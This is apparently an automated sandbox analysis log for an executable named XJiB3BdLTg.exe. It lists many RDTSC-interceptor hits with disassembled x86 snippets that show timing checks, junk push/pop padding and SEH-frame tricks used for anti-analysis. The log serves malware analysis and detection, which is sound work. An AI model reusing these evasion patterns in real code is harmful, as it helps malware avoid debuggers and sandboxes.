Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC71CA second address: AC71EE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BD0FFF0D8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC7A75 second address: AC7A90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: ACA913 second address: ACA917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: AC9A1A second address: AC9A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F5BD0C7BA68h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov bx, 673Bh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F5BD0C7BA68h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov ebx, edi 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov eax, dword ptr [ebp+12A30C59h] 0x00000043 mov dword ptr [ebp+12A317A9h], ebx 0x00000049 push FFFFFFFFh 0x0000004b mov ebx, 582BF3E0h 0x00000050 push eax 0x00000051 push esi 0x00000052 je 00007F5BD0C7BA6Ch 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACAAFC second address: ACAB01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACAB01 second address: ACAB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDCDE second address: ACDCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDCE3 second address: ACDCED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDCED second address: ACDD63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BD0FFF0CEh 0x00000013 pop edx 0x00000014 nop 0x00000015 mov ebx, dword ptr [ebp+12A317DCh] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F5BD0FFF0C8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov edi, dword ptr [ebp+12A337A1h] 0x0000003d push 00000000h 0x0000003f mov ebx, dword ptr [ebp+12A32A3Ah] 0x00000045 ja 00007F5BD0FFF0CCh 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F5BD0FFF0D3h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACB9D7 second address: ACB9F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACB9F6 second address: ACB9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACB9FB second address: ACBA17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA78h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACBAD6 second address: ACBADC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACBADC second address: ACBAE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACBAE1 second address: ACBAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACED0C second address: ACED5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F5BD0C7BA66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f sub bh, 00000002h 0x00000012 push 00000000h 0x00000014 or bx, FA97h 0x00000019 push 00000000h 0x0000001b movsx edi, di 0x0000001e xchg eax, esi 0x0000001f jno 00007F5BD0C7BA70h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jno 00007F5BD0C7BA7Eh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDEE1 second address: ACDF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+12A32624h], eax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F5BD0FFF0C8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov edi, dword ptr [ebp+12A33410h] 0x0000003e jmp 00007F5BD0FFF0D1h 0x00000043 mov eax, dword ptr [ebp+12A302B1h] 0x00000049 mov ebx, 6E65F2AFh 0x0000004e or dword ptr [ebp+12BD06C8h], ecx 0x00000054 push FFFFFFFFh 0x00000056 xor ebx, dword ptr [ebp+12BD7BA9h] 0x0000005c nop 0x0000005d je 00007F5BD0FFF0E3h 0x00000063 pushad 0x00000064 push edx 0x00000065 pop edx 0x00000066 jmp 00007F5BD0FFF0D9h 0x0000006b popad 0x0000006c push eax 0x0000006d push ecx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F5BD0FFF0D4h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDF8F second address: ACDF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACEF46 second address: ACEF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD08E9 second address: AD093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+12A32ABEh] 0x0000000d xor dword ptr [ebp+12BD24C1h], ebx 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 mov si, ax 0x00000019 stc 0x0000001a popad 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F5BD0C7BA68h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov ebx, dword ptr [ebp+12A31A77h] 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F5BD0C7BA6Ah 0x00000045 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD1AEC second address: AD1AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD29D9 second address: AD2A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F5BD0C7BA68h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 add dword ptr [ebp+12A3181Fh], esi 0x00000028 push dword ptr fs:[00000000h] 0x0000002f sub dword ptr [ebp+12A3181Fh], edi 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov dword ptr [ebp+12BAE704h], edi 0x00000042 mov eax, dword ptr [ebp+12A30735h] 0x00000048 jg 00007F5BD0C7BA69h 0x0000004e push FFFFFFFFh 0x00000050 mov edi, ebx 0x00000052 mov dword ptr [ebp+12BAA258h], ecx 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD2A3D second address: AD2A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD2A42 second address: AD2A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD2A4C second address: AD2A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD492E second address: AD4932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD585A second address: AD585F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD585F second address: AD5887 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnc 00007F5BD0C7BA7Bh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD779C second address: AD77A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD5887 second address: AD5919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA75h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F5BD0C7BA68h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 sbb bl, 00000012h 0x00000029 cld 0x0000002a push dword ptr fs:[00000000h] 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F5BD0C7BA68h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b or di, 3887h 0x00000050 mov dword ptr fs:[00000000h], esp 0x00000057 mov edi, dword ptr [ebp+12A32B56h] 0x0000005d mov eax, dword ptr [ebp+12A3051Dh] 0x00000063 add dword ptr [ebp+12A337CCh], eax 0x00000069 push FFFFFFFFh 0x0000006b xor dword ptr [ebp+12A3270Ah], edx 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push edi 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD5919 second address: AD591E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD79A7 second address: AD79AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE16DD second address: AE16E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE16E9 second address: AE1714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BD0C7BA66h 0x0000000a pop edx 0x0000000b jmp 00007F5BD0C7BA78h 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F5BD0C7BA66h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE0E7D second address: AE0E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F5BD0FFF0C6h 0x0000000c jnl 00007F5BD0FFF0C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE116D second address: AE1177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE1177 second address: AE1183 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5BD0FFF0C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE12E9 second address: AE12F3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5BD0C7BA66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE12F3 second address: AE12FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE12FD second address: AE1303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7B91 second address: AE7B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7B97 second address: AE7BCB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F5BD0C7BA7Dh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F5BD0C7BA68h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7BCB second address: AE7BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7BD1 second address: AE7BED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F5BD0C7BA6Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7CD3 second address: AE7CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7CD9 second address: AE7CEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F5BD0C7BA66h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE7CEE second address: AE7D11 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5BD0FFF0D0h 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AECB59 second address: AECB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A71409 second address: A71411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A71411 second address: A71415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A71415 second address: A7143D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BD0FFF0C6h 0x00000008 jl 00007F5BD0FFF0C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BD0FFF0D4h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A7143D second address: A71449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F5BD0C7BA66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A71449 second address: A71465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AEC09B second address: AEC0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AEC4B9 second address: AEC4CA instructions: 0x00000000 rdtsc 0x00000002 je 00007F5BD0FFF0C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4003 second address: AF4012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007F5BD0C7BA66h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4166 second address: AF4182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F5BD0FFF0C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4182 second address: AF4199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5BD0C7BA71h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4199 second address: AF419F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF419F second address: AF41A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF41A5 second address: AF41A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF41A9 second address: AF41BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F5BD0C7BA66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF41BC second address: AF41C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4487 second address: AF448B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF448B second address: AF44BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BD0FFF0D8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnp 00007F5BD0FFF0C6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F5BD0FFF0C6h 0x00000019 jc 00007F5BD0FFF0C6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF44BD second address: AF44C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4607 second address: AF4621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F5BD0FFF0C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4621 second address: AF4625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF48AC second address: AF48B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4B89 second address: AF4B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4B8D second address: AF4BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5BD0FFF0D5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4BB7 second address: AF4BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4CFB second address: AF4D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5BD0FFF0D5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4D15 second address: AF4D3D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5BD0C7BA72h 0x00000008 jnc 00007F5BD0C7BA66h 0x0000000e jns 00007F5BD0C7BA66h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5BD0C7BA70h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4EA9 second address: AF4EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF4EAE second address: AF4EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007F5BD0C7BA66h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F5BD0C7BA6Eh 0x00000016 jmp 00007F5BD0C7BA70h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f je 00007F5BD0C7BA66h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF5498 second address: AF54AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F5BD0FFF0CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
